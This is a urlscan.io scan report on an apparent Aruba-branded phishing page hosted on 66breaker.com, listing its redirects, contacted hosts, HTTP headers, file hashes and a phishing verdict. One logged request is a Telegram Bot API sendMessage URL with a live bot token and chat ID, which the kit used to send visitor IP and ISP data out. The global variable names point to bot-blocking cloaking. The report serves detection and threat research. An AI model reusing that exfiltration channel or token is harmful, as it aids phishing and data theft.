urlscan.io logo urlscan.io
SecurityTrails logo

66breaker.com Open in urlscan Pro
114.215.173.192  Malicious Activity! Public Scan

Go To Rescan Add Verdict Report
Submitted URL: https://ln.run/XrKFX
Effective URL: http://66breaker.com/pagamenti.aruba.it/
Submission: On January 16 via api from US — Scanned from IT
 Behaviour Indicators
Similar DOM Content API
Verdicts

Summary

This website contacted 7 IPs in 4 countries across 7 domains to perform 11 HTTP transactions. The main IP is 114.215.173.192, located in Hangzhou, China and belongs to ALIBABA-CN-NET Hangzhou Alibaba Advertising Co.,Ltd., CN. The main domain is 66breaker.com.
This is the only time 66breaker.com was scanned on urlscan.io!

urlscan.io Verdict: Potentially Malicious

Targeting these brands: Aruba (Online)

Domain & IP information

IP Address AS Autonomous System
1 1 2a06:98c1:312... 13335 (CLOUDFLAR...)
5 114.215.173.192 37963 (ALIBABA-C...)
1 208.95.112.1 53334 (TUT-AS)
1 2001:67c:4e8:... 62041 (TELEGRAM)
1 2a00:1450:400... 15169 (GOOGLE)
1 23.55.110.151 20940 (AKAMAI-ASN1)
2 2a00:1450:400... 15169 (GOOGLE)
11 7
1    2a06:98c1:3121::3 (United States)

ASN13335 (CLOUDFLARENET, US)
ln.run
5    114.215.173.192 (Hangzhou, China)

ASN37963 (ALIBABA-CN-NET Hangzhou Alibaba Advertising Co.,Ltd., CN)
66breaker.com
1    208.95.112.1 (United States)

ASN53334 (TUT-AS, US)
PTR: ip-api.com
ip-api.com
1    2001:67c:4e8:f004::9 (Amsterdam, Netherlands)

ASN62041 (TELEGRAM, VG)
api.telegram.org
1    2a00:1450:4001:82a::200a (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)
fonts.googleapis.com
1    23.55.110.151 (Frankfurt am Main, Germany)

ASN20940 (AKAMAI-ASN1, NL)
PTR: a23-55-110-151.deploy.static.akamaitechnologies.com
secure-ds.serving-sys.com
2    2a00:1450:4001:828::2003 (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)
fonts.gstatic.com
Apex Domain
Subdomains		 Transfer
5 66breaker.com
66breaker.com
442 KB
2 gstatic.com
fonts.gstatic.com
28 KB
1 serving-sys.com
secure-ds.serving-sys.com — Cisco Umbrella Rank: 3539
23 KB
1 googleapis.com
fonts.googleapis.com — Cisco Umbrella Rank: 28
831 B
1 telegram.org
api.telegram.org — Cisco Umbrella Rank: 42136
713 B
1 ip-api.com
ip-api.com — Cisco Umbrella Rank: 4380
451 B
1 ln.run
ln.run — Cisco Umbrella Rank: 622696
608 B
11 7
Domain Requested by
5 66breaker.com 66breaker.com
2 fonts.gstatic.com fonts.googleapis.com
1 secure-ds.serving-sys.com 66breaker.com
1 fonts.googleapis.com 66breaker.com
1 api.telegram.org 66breaker.com
1 ip-api.com 66breaker.com
1 ln.run 1 redirects
11 7

This site contains no links.

Subject Issuer Validity Valid
api.telegram.org
Go Daddy Secure Certificate Authority - G2		 2023-03-26 -
2024-04-26		 a year crt.sh
upload.video.google.com
GTS CA 1C3		 2023-12-11 -
2024-03-04		 3 months crt.sh
secure-ds.serving-sys.com
R3		 2023-11-28 -
2024-02-26		 3 months crt.sh
*.gstatic.com
GTS CA 1C3		 2023-12-11 -
2024-03-04		 3 months crt.sh

This page contains 2 frames:

Primary Page: http://66breaker.com/pagamenti.aruba.it/
Frame ID: 64374A0B90E5DE608CA13AB71E2137D5
Requests: 4 HTTP requests in this frame

Frame: http://66breaker.com/pagamenti.aruba.it/1.html?_ga=2.674.735.454-211.685
Frame ID: D67EE84DFE11A6505693D6761D9B1316
Requests: 15 HTTP requests in this frame

Screenshot
Live screenshot
Full Image

Page Title

Metodi di pagamento

Page URL History Show full URLs

  1. https://ln.run/XrKFX HTTP 301
    http://66breaker.com/pagamenti.aruba.it/ Page URL

Detected technologies

Overall confidence: 100%
Detected patterns
  • serving-sys\.com/

Page Statistics

11
Requests

45 %
HTTPS

57 %
IPv6

7
Domains

7
Subdomains

7
IPs

4
Countries

495 kB
Transfer

1182 kB
Size

0
Cookies

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

  1. https://ln.run/XrKFX HTTP 301
    http://66breaker.com/pagamenti.aruba.it/ Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

11 HTTP transactions

Resource
Path		 Size
x-fer		 Type
MIME-Type
Primary Request /
66breaker.com/pagamenti.aruba.it/
Redirect Chain
  • https://ln.run/XrKFX
  • http://66breaker.com/pagamenti.aruba.it/
5 KB
2 KB 		Document
General
Check archive.org
Download Go to
Full URL
http://66breaker.com/pagamenti.aruba.it/
Protocol
HTTP/1.1
Server
114.215.173.192 Hangzhou, China, ASN37963 (ALIBABA-CN-NET Hangzhou Alibaba Advertising Co.,Ltd., CN),
Reverse DNS
Software
nginx /
Resource Hash
a582c9f6d4a361f46e94a13d950c25ccc127d70ed2e525fb0bfc2252f1837b05

Request headers

Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1
accept-language
it-IT,it;q=0.9

Response headers

Connection
keep-alive
Content-Encoding
gzip
Content-Type
text/html
Date
Tue, 16 Jan 2024 08:28:35 GMT
Server
nginx
Transfer-Encoding
chunked
Vary
Accept-Encoding

Redirect headers

alt-svc
h3=":443"; ma=86400
cache-control
no-cache, no-store, max-age=0, must-revalidate
cf-cache-status
DYNAMIC
cf-ray
8464fc562d885268-MXP
content-language
en
date
Tue, 16 Jan 2024 08:28:34 GMT
expires
0
location
http://66breaker.com/pagamenti.aruba.it/
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
pragma
no-cache
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W8PI%2Bw%2Bc65900ORaR6giAZJhHYCAC7bo9ED9MbN9%2FG7tryhHzPMsxYCRG6aC8kzSRamXIyJw1xefT%2FLjiowzn4%2Bvk862P4C8OP31G4lWAv3HxcGuLAuks0uMs0I%2B1hKCuvyyb%2BI%3D"}],"group":"cf-nel","max_age":604800}
server
cloudflare
x-content-type-options
nosniff
x-xss-protection
1; mode=block
1.html
66breaker.com/pagamenti.aruba.it/ Frame D67E 		14 KB
5 KB 		Document
General
Check archive.org
Download Go to
Full URL
http://66breaker.com/pagamenti.aruba.it/1.html?_ga=2.674.735.454-211.685
Requested by
Host: 66breaker.com
URL: http://66breaker.com/pagamenti.aruba.it/
Protocol
HTTP/1.1
Server
114.215.173.192 Hangzhou, China, ASN37963 (ALIBABA-CN-NET Hangzhou Alibaba Advertising Co.,Ltd., CN),
Reverse DNS
Software
nginx /
Resource Hash
be8ef655c16fa2d597506b32f3066d2eb60040075619d87c208384e25cd8a54a

Request headers

Referer
http://66breaker.com/pagamenti.aruba.it/
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1
accept-language
it-IT,it;q=0.9

Response headers

Connection
keep-alive
Content-Encoding
gzip
Content-Type
text/html
Date
Tue, 16 Jan 2024 08:28:36 GMT
Server
nginx
Transfer-Encoding
chunked
Vary
Accept-Encoding
/
ip-api.com/json/ 		274 B
451 B 		Fetch
General
Check archive.org
Download Go to
Full URL
http://ip-api.com/json/
Requested by
Host: 66breaker.com
URL: http://66breaker.com/pagamenti.aruba.it/
Protocol
HTTP/1.1
Server
208.95.112.1 , United States, ASN53334 (TUT-AS, US),
Reverse DNS
ip-api.com
Software
/
Resource Hash
cbd15353f28a39742f3f1dc07cbe39917f0d70396f5bb66c1d9f3bc1eff4690e

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

Access-Control-Allow-Origin
*
Date
Tue, 16 Jan 2024 08:28:35 GMT
X-Rl
44
X-Ttl
60
Content-Length
274
Content-Type
application/json; charset=utf-8
sendMessage
api.telegram.org/bot5722386700:AAHiZt_01l2aTSOZrQfiaegpFlmVufBMtYo/ 		466 B
713 B 		Fetch
General
Check archive.org
Download Go to
Full URL
https://api.telegram.org/bot5722386700:AAHiZt_01l2aTSOZrQfiaegpFlmVufBMtYo/sendMessage?chat_id=-4142709845&text=%F0%9F%98%80%20Rah%20d5l%20Arubaitalia%20%F0%9F%98%80%3A%20Italy%0A%F0%9F%8C%8D%20Country%3A%20Italy%0A%F0%9F%93%8D%20IP%3A%20192.145.127.220%0A%F0%9F%93%A1%20ISP%3A%20M247%20Europe%20SRL
Requested by
Host: 66breaker.com
URL: http://66breaker.com/pagamenti.aruba.it/
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
2001:67c:4e8:f004::9 Amsterdam, Netherlands, ASN62041 (TELEGRAM, VG),
Reverse DNS
Software
nginx/1.18.0 /
Resource Hash
77250c2a5df954478ed1c20ac8c87236b23a8da478e29146ab386f3991c27812
Security Headers
Name Value
Strict-Transport-Security max-age=31536000; includeSubDomains; preload

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

date
Tue, 16 Jan 2024 08:28:36 GMT
strict-transport-security
max-age=31536000; includeSubDomains; preload
server
nginx/1.18.0
access-control-allow-methods
GET, POST, OPTIONS
content-type
application/json
access-control-allow-origin
*
access-control-expose-headers
Content-Length,Content-Type,Date,Server,Connection
content-length
466
css
fonts.googleapis.com/ Frame D67E 		4 KB
831 B 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://fonts.googleapis.com/css?family=Lato:400,300,700|Karla:400,700
Requested by
Host: 66breaker.com
URL: http://66breaker.com/pagamenti.aruba.it/1.html?_ga=2.674.735.454-211.685
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a00:1450:4001:82a::200a Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),
Reverse DNS
Software
ESF /
Resource Hash
c1195509ac4307b32439690d6a47e9dea2e0b8b527de1d6c9ca74e08df2792ec
Security Headers
Name Value
Strict-Transport-Security max-age=31536000
X-Content-Type-Options nosniff
X-Frame-Options SAMEORIGIN
X-Xss-Protection 0

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

strict-transport-security
max-age=31536000
date
Tue, 16 Jan 2024 08:28:36 GMT
content-encoding
gzip
x-content-type-options
nosniff
server
ESF
x-frame-options
SAMEORIGIN
content-type
text/css; charset=utf-8
access-control-allow-origin
*
cache-control
private, max-age=86400
cross-origin-resource-policy
cross-origin
timing-allow-origin
*
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
x-xss-protection
0
expires
Tue, 16 Jan 2024 08:28:36 GMT
1.css
66breaker.com/pagamenti.aruba.it/css/ Frame D67E 		1 MB
435 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
http://66breaker.com/pagamenti.aruba.it/css/1.css
Requested by
Host: 66breaker.com
URL: http://66breaker.com/pagamenti.aruba.it/1.html?_ga=2.674.735.454-211.685
Protocol
HTTP/1.1
Server
114.215.173.192 Hangzhou, China, ASN37963 (ALIBABA-CN-NET Hangzhou Alibaba Advertising Co.,Ltd., CN),
Reverse DNS
Software
nginx /
Resource Hash
1580bdf362d0a7def2d782c3f2fe308e67647dd7f700cdf1a8f38a7fcd8a9dc2

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/pagamenti.aruba.it/1.html?_ga=2.674.735.454-211.685
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

Date
Tue, 16 Jan 2024 08:28:36 GMT
Content-Encoding
gzip
Last-Modified
Wed, 10 Jan 2024 06:05:43 GMT
Server
nginx
ETag
W/"659e33b7-1123e6"
Transfer-Encoding
chunked
Vary
Accept-Encoding
Content-Type
text/css
Connection
keep-alive
730x120_Aruba%20Drive_0623_79720553372469839.jpg
secure-ds.serving-sys.com/resources/PROD/asset/1073743419/IMAGE/20230531/ Frame D67E 		23 KB
23 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
https://secure-ds.serving-sys.com/resources/PROD/asset/1073743419/IMAGE/20230531/730x120_Aruba%20Drive_0623_79720553372469839.jpg
Requested by
Host: 66breaker.com
URL: http://66breaker.com/pagamenti.aruba.it/1.html?_ga=2.674.735.454-211.685
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
23.55.110.151 Frankfurt am Main, Germany, ASN20940 (AKAMAI-ASN1, NL),
Reverse DNS
a23-55-110-151.deploy.static.akamaitechnologies.com
Software
AmazonS3 /
Resource Hash
d2614a9b5fe46791084396eda1aa46757fc19502b5f4230b1f7ef51e4636f343

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

x-amz-version-id
LMO0O.bg72dzs45kiWm_g919dE.szsAM
date
Tue, 16 Jan 2024 08:28:36 GMT
last-modified
Wed, 31 May 2023 07:03:25 GMT
server
AmazonS3
x-amz-cf-pop
FRA6-C1
x-amz-server-side-encryption
AES256
etag
"efafb78646b23f5c4b6f701ce61e8821"
vary
Accept-Encoding
content-type
image/jpeg
access-control-allow-origin
*
accept-ranges
bytes
content-length
23454
x-amz-cf-id
lvWefI13a4sMK3lkAWp423RlvPEc4zQOUc2sTAoB8PAaL8nzdJ81rg==
expires
Mon, 31 Dec 2035 00:00:00 GMT
truncated
/ Frame D67E 		192 B
0 		Image
General
Check archive.org
Download Go to Show image
Full URL
data:truncated
Protocol
DATA
Server
-, , ASN (),
Reverse DNS
Software
/
Resource Hash
6a520068cfa122b5343c3dcd4a5f4ae68d0282e196d0f13c0da85c08f6bec6b1

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

Content-Type
image/png
truncated
/ Frame D67E 		9 KB
0 		Image
General
Check archive.org
Download Go to Show image
Full URL
data:truncated
Protocol
DATA
Server
-, , ASN (),
Reverse DNS
Software
/
Resource Hash
6356e4bc2e9903035a77db1b73399b8c0ce412df3f46f370b1a53ac830c9a808

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

Content-Type
image/png
truncated
/ Frame D67E 		458 B
0 		Image
General
Check archive.org
Download Go to Show image
Full URL
data:truncated
Protocol
DATA
Server
-, , ASN (),
Reverse DNS
Software
/
Resource Hash
557f3f13863a560bbabfb24998f452265d5a281f605d5a4183d97b7778ba728d

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

Content-Type
image/png
truncated
/ Frame D67E 		151 B
0 		Image
General
Check archive.org
Download Go to Show image
Full URL
data:truncated
Protocol
DATA
Server
-, , ASN (),
Reverse DNS
Software
/
Resource Hash
e90f9744ae170f4b33a7e4efd3219f5cf5731b5bebd1a28ca991b12f10fe1f9f

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

Content-Type
image/png
truncated
/ Frame D67E 		195 B
0 		Image
General
Check archive.org
Download Go to Show image
Full URL
data:truncated
Protocol
DATA
Server
-, , ASN (),
Reverse DNS
Software
/
Resource Hash
ac190d1d4b699a63755c4e14264abfad3d99f9071707f733e01859e56f106f58

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

Content-Type
image/png
truncated
/ Frame D67E 		121 B
0 		Image
General
Check archive.org
Download Go to Show image
Full URL
data:truncated
Protocol
DATA
Server
-, , ASN (),
Reverse DNS
Software
/
Resource Hash
cb1ce7ebc50ad154dc1ace90b9981665fe850fa34a449b6939270963dead4d71

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

Content-Type
image/png
truncated
/ Frame D67E 		469 B
0 		Image
General
Check archive.org
Download Go to Show image
Full URL
data:truncated
Protocol
DATA
Server
-, , ASN (),
Reverse DNS
Software
/
Resource Hash
6e90d3c6cd007c613b6437d3a81859901954618ad4e0ccb4d02d819d89fb14a4

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

Content-Type
image/png
truncated
/ Frame D67E 		325 B
0 		Image
General
Check archive.org
Download Go to Show image
Full URL
data:truncated
Protocol
DATA
Server
-, , ASN (),
Reverse DNS
Software
/
Resource Hash
c58a53852cc69e5a6abf49d674b49ff637c6ed1b243ed3c7d78fd3f9dcb7e696

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

Content-Type
image/png
S6uyw4BMUTPHjx4wXiWtFCc.woff2
fonts.gstatic.com/s/lato/v24/ Frame D67E 		14 KB
14 KB 		Font
General
Check archive.org
Download Go to
Full URL
https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXiWtFCc.woff2
Requested by
Host: fonts.googleapis.com
URL: https://fonts.googleapis.com/css?family=Lato:400,300,700|Karla:400,700
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a00:1450:4001:828::2003 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),
Reverse DNS
Software
sffe /
Resource Hash
d4ae5188a65370ecfe28f42293bbee8297cfd5712c6aadfdb270d48f2bcd88b0
Security Headers
Name Value
X-Content-Type-Options nosniff
X-Xss-Protection 0

Request headers

Referer
https://fonts.googleapis.com/
Origin
http://66breaker.com
accept-language
it-IT,it;q=0.9
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

date
Sat, 13 Jan 2024 06:12:52 GMT
x-content-type-options
nosniff
age
267346
content-security-policy-report-only
require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length
13980
x-xss-protection
0
last-modified
Tue, 02 May 2023 15:17:19 GMT
server
sffe
cross-origin-opener-policy
same-origin; report-to="apps-themes"
report-to
{"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
content-type
font/woff2
access-control-allow-origin
*
cache-control
public, max-age=31536000
accept-ranges
bytes
timing-allow-origin
*
expires
Sun, 12 Jan 2025 06:12:52 GMT
S6u9w4BMUTPHh6UVSwiPGQ3q5d0.woff2
fonts.gstatic.com/s/lato/v24/ Frame D67E 		14 KB
14 KB 		Font
General
Check archive.org
Download Go to
Full URL
https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwiPGQ3q5d0.woff2
Requested by
Host: fonts.googleapis.com
URL: https://fonts.googleapis.com/css?family=Lato:400,300,700|Karla:400,700
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a00:1450:4001:828::2003 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),
Reverse DNS
Software
sffe /
Resource Hash
7a7ce1a34f3e9944fe88fc61abbc93b6db383afa2b90815fd7ccea456fbce4e5
Security Headers
Name Value
X-Content-Type-Options nosniff
X-Xss-Protection 0

Request headers

Referer
https://fonts.googleapis.com/
Origin
http://66breaker.com
accept-language
it-IT,it;q=0.9
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

date
Mon, 15 Jan 2024 21:16:47 GMT
x-content-type-options
nosniff
age
40311
content-security-policy-report-only
require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length
14168
x-xss-protection
0
last-modified
Tue, 02 May 2023 15:29:56 GMT
server
sffe
cross-origin-opener-policy
same-origin; report-to="apps-themes"
report-to
{"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
content-type
font/woff2
access-control-allow-origin
*
cache-control
public, max-age=31536000
accept-ranges
bytes
timing-allow-origin
*
expires
Tue, 14 Jan 2025 21:16:47 GMT
blocklist.txt
66breaker.com/pagamenti.aruba.it/ Frame D67E 		23 B
253 B 		Fetch
General
Check archive.org
Download Go to
Full URL
http://66breaker.com/pagamenti.aruba.it/blocklist.txt
Requested by
Host: 66breaker.com
URL: http://66breaker.com/pagamenti.aruba.it/1.html?_ga=2.674.735.454-211.685
Protocol
HTTP/1.1
Server
114.215.173.192 Hangzhou, China, ASN37963 (ALIBABA-CN-NET Hangzhou Alibaba Advertising Co.,Ltd., CN),
Reverse DNS
Software
nginx /
Resource Hash
7a2a89f298c66b12a6a983dedf138c3afd2a63928ab163670799ef1aaa2b249e

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/pagamenti.aruba.it/1.html?_ga=2.674.735.454-211.685
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

Date
Tue, 16 Jan 2024 08:28:39 GMT
Last-Modified
Fri, 12 Jan 2024 00:02:00 GMT
Server
nginx
ETag
"65a08178-17"
Content-Type
text/plain
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
23
blocklist.txt
66breaker.com/pagamenti.aruba.it/ 		23 B
253 B 		Fetch
General
Check archive.org
Download Go to
Full URL
http://66breaker.com/pagamenti.aruba.it/blocklist.txt
Requested by
Host: 66breaker.com
URL: http://66breaker.com/pagamenti.aruba.it/
Protocol
HTTP/1.1
Server
114.215.173.192 Hangzhou, China, ASN37963 (ALIBABA-CN-NET Hangzhou Alibaba Advertising Co.,Ltd., CN),
Reverse DNS
Software
nginx /
Resource Hash
7a2a89f298c66b12a6a983dedf138c3afd2a63928ab163670799ef1aaa2b249e

Request headers

accept-language
it-IT,it;q=0.9
Referer
http://66breaker.com/pagamenti.aruba.it/
User-Agent
Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1

Response headers

Date
Tue, 16 Jan 2024 08:28:39 GMT
Last-Modified
Fri, 12 Jan 2024 00:02:00 GMT
Server
nginx
ETag
"65a08178-17"
Content-Type
text/plain
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
23

Verdicts & Comments Add Verdict or Comment

Potentially malicious activity detected
Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!

urlscan

Phishing against: Aruba (Online)

10 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

object| 0 function| isKnownBrowser function| isLikelyBot function| blockBotAccess boolean| isBot string| dynamicUrl string| botToken string| chatId function| generateRandomNumber function| checkBlocklist

0 Cookies

Indicators

This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.

66breaker.com
api.telegram.org
fonts.googleapis.com
fonts.gstatic.com
ip-api.com
ln.run
secure-ds.serving-sys.com
114.215.173.192
2001:67c:4e8:f004::9
208.95.112.1
23.55.110.151
2a00:1450:4001:828::2003
2a00:1450:4001:82a::200a
2a06:98c1:3121::3
1580bdf362d0a7def2d782c3f2fe308e67647dd7f700cdf1a8f38a7fcd8a9dc2
557f3f13863a560bbabfb24998f452265d5a281f605d5a4183d97b7778ba728d
6356e4bc2e9903035a77db1b73399b8c0ce412df3f46f370b1a53ac830c9a808
6a520068cfa122b5343c3dcd4a5f4ae68d0282e196d0f13c0da85c08f6bec6b1
6e90d3c6cd007c613b6437d3a81859901954618ad4e0ccb4d02d819d89fb14a4
77250c2a5df954478ed1c20ac8c87236b23a8da478e29146ab386f3991c27812
7a2a89f298c66b12a6a983dedf138c3afd2a63928ab163670799ef1aaa2b249e
7a7ce1a34f3e9944fe88fc61abbc93b6db383afa2b90815fd7ccea456fbce4e5
a582c9f6d4a361f46e94a13d950c25ccc127d70ed2e525fb0bfc2252f1837b05
ac190d1d4b699a63755c4e14264abfad3d99f9071707f733e01859e56f106f58
be8ef655c16fa2d597506b32f3066d2eb60040075619d87c208384e25cd8a54a
c1195509ac4307b32439690d6a47e9dea2e0b8b527de1d6c9ca74e08df2792ec
c58a53852cc69e5a6abf49d674b49ff637c6ed1b243ed3c7d78fd3f9dcb7e696
cb1ce7ebc50ad154dc1ace90b9981665fe850fa34a449b6939270963dead4d71
cbd15353f28a39742f3f1dc07cbe39917f0d70396f5bb66c1d9f3bc1eff4690e
d2614a9b5fe46791084396eda1aa46757fc19502b5f4230b1f7ef51e4636f343
d4ae5188a65370ecfe28f42293bbee8297cfd5712c6aadfdb270d48f2bcd88b0
e90f9744ae170f4b33a7e4efd3219f5cf5731b5bebd1a28ca991b12f10fe1f9f